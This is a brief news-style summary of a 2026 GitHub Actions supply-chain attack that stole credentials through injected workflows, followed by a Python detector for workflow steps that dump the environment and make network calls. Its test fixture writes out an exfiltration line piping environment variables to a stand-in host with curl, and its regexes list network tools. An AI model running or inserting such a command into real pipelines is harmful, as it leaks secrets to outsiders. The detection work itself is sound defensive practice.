On May 18, 2026, a significant supply chain attack named **Megalodon** targeted over 5,500 public GitHub repositories in a 6-hour window. Attackers exploited weak branch protection to inject malicious CI/CD workflows designed to steal cloud credentials, SSH keys, and OAuth tokens. The attack used a **direct Poisoned Pipeline Execution (d-PPE)** technique, which bypassed pull request reviews and executed commands to harvest sensitive information.
Affected repositories included those of notable organizations such as Tiledesk and Black-Iron-Project. The campaign's payload collected data via environment variable dumps and transmitted it to an external server, leaving little trace. Stronger branch protection is needed, and further analysis is ongoing to assess the full impact of the attack.
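An added example, not code from the campaign or from any affected project: a heuristic audit that flags workflow `run` steps which both dump the environment and invoke a network client, the payload shape described above. The regexes, function names and sample workflow fragments are assumptions constructed for illustration.

```python
import re

# Heuristics chosen for this example (assumptions, not indicators from the campaign).
ENV_DUMP = re.compile(
    r"(?<![\w.-])(?:printenv|env|export[ \t]+-p)(?=[ \t]*(?:\||>|$))|toJSON\(\s*secrets\s*\)", re.M)
EGRESS = re.compile(r"(?<![\w.-])(?:curl|wget|nc|ncat)[ \t]")

def run_blocks(text):
    """Yield (line_no, script) for every `run:` step, including block scalars."""
    lines, i = text.splitlines(), 0
    while i < len(lines):
        m = re.match(r"^(\s*)(?:-\s+)?run:\s*(.*)$", lines[i])
        i += 1
        if not m:
            continue
        line_no, indent, body = i, len(m.group(1)), [m.group(2)]
        if re.fullmatch(r"[|>][+-]?", m.group(2).strip()):
            body = []
            # Block content is every following line indented deeper than the key.
            while i < len(lines) and (not lines[i].strip()
                    or len(lines[i]) - len(lines[i].lstrip()) > indent):
                body.append(lines[i].strip())
                i += 1
        yield line_no, "\n".join(body)

def audit(text):
    """Return line numbers of run steps that dump the environment and call out."""
    return [n for n, s in run_blocks(text) if ENV_DUMP.search(s) and EGRESS.search(s)]

# Constructed workflow fragments, not files recovered from affected repositories.
SUSPICIOUS = """\
jobs:
  build:
    steps:
      - name: warm cache
        run: |
          env | curl -s -d @- https://collector.example.invalid/u
"""
BENIGN = """\
jobs:
  test:
    steps:
      - run: env NODE_ENV=test npm test
      - run: curl -fsS https://registry.example.invalid/health
"""

if __name__ == "__main__":
    print("suspicious:", audit(SUSPICIOUS), "benign:", audit(BENIGN))
```

A hit is a prompt for review rather than proof of compromise; the check is most useful on commits that touched `.github/workflows/` without going through a pull request.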